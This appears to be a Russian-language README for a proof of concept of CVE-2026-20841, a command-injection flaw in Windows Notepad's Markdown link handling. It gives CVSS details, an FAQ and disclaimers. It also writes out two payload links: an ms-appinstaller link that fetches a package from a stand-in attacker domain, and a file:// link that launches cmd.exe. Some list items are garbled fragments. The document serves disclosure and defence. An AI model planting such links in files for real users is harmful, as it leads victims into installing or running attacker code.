
Доказательство концепции, демонстрирующее внедрение команд в Блокнот Windows через специально созданные ссылки Markdown, что позволяет выполнять удалённый код. Включает векторы атак, метрики CVSS и рекомендации по устранению уязвимости.
| Поле | Детали |
|---|
| ID CVE | CVE-2026-20841 |
| Название | Уязвимость удаленного выполнения кода в приложении «Блокнот» Windows |
| Воздействие | Удаленное выполнение кода |
| Максимальный уровень серьезности | Важный |
| CVSS v3.1 Базовый / Временный | 8.8 / 7.7 |
| Вектор CVSS | CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H/E:U/RL:O/RC:C |
| CWE | CWE-77: Некорректная нейтрализация специальных элементов, используемых в команде («внедрение команды») |
| Затронутый продукт | Приложение «Блокнот» Windows (версия из Microsoft Store, сборки до 11.2510) |
| Назначивший CNA | Microsoft |
| Опубликовано | 10 февраля 2026 г. |
| Публично раскрыто | Нет |
| Эксплуатируется | Нет |
| Оценка эксплуатируемости | Эксплуатация маловероятна |
Некорректная нейтрализация специальных элементов, используемых в команде («внедрение команды»), в приложении «Блокнот» Windows позволяет неавторизованному злоумышленнику выполнять код по сети.
Современное приложение «Блокнот» Windows (распространяемое через Microsoft Store) получило поддержку рендеринга Markdown, включая кликабельные гиперссылки. Уязвимость существует из-за того, что «Блокнот» не выполняет надлежащую проверку и очистку схем URI в ссылках Markdown перед их обработкой. Злоумышленник может создать вредоносный файл .md, содержащий специально сформированные ссылки, которые при нажатии пользователем запускают непроверенные обработчики протоколов для загрузки и выполнения удаленного содержимого.
| Метрика | Значение |
|---|---|
| Вектор атаки | Сеть |
| Сложность атаки | Низкая |
| Требуемые привилегии | Отсутствуют |
| Взаимодействие с пользователем | Требуется |
| Область действия | Без изменений |
| Влияние на конфиденциальность | Высокое |
| Влияние на целостность | Высокое |
| Влияние на доступность | Высокое |
| Метрика | Значение |
|---|---|
| Зрелость эксплойт-кода | Не подтверждена |
| Уровень устранения | Официальное исправление |
| Достоверность отчета | Подтверждена |
Как злоумышленник может использовать эту уязвимость?
Злоумышленник может обманом заставить пользователя нажать на вредоносную ссылку внутри файла Markdown, открытого в «Блокноте», что приведет к запуску приложением непроверенных протоколов, загружающих и выполняющих удаленные файлы.
Каков целевой контекст удаленного выполнения кода?
Согласно метрике CVSS, вектор атаки — сеть (AV:N), и требуется взаимодействие с пользователем (UI:R). Вредоносный код будет выполняться в контексте безопасности пользователя, открывшего файл Markdown, что дает злоумышленнику те же права, что и у этого пользователя.
.md), содержащий вредоносные гиперссылки.ms-appinstaller://), которые могут загружать и выполнять удаленные полезные нагрузки, или URI file://, которые могут напрямую запускать локальные исполняемые файлы.Отказ от ответственности: Этот proof of concept предоставлен строго в образовательных целях и для авторизованных исследований безопасности. Не используйте его против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения. Несанкционированный доступ к компьютерным системам незаконен и наказуем по закону.
PoC демонстрирует два вектора атаки через специально созданные ссылки Markdown:
Вектор 1 — Удаленная установка полезной нагрузки через злоупотребление обработчиком протокола:
[Нажмите для просмотра документа](ms-appinstaller://?source=https://attacker-controlled-domain/malicious.appx)
Вектор 2 — Запуск локального исполняемого файла через URI файла:
[Нажмите здесь](file://C:/windows/system32/cmd.exe)

.md из ненадежных источников в «Блокноте».Информация, представленная в этом репозитории, предназначена только для образовательных целей и авторизованных исследований безопасности. Этот proof of concept публикуется, чтобы помочь специалистам по защите понять и смягчить уязвимость. Автор не несет ответственности за любое неправомерное использование информации или инструментов, представленных здесь. Всегда получайте надлежащее письменное разрешение перед тестированием систем на уязвимости. Несанкционированный доступ к компьютерным системам является уголовным преступлением в большинстве юрисдикций. Используйте ответственно и этично.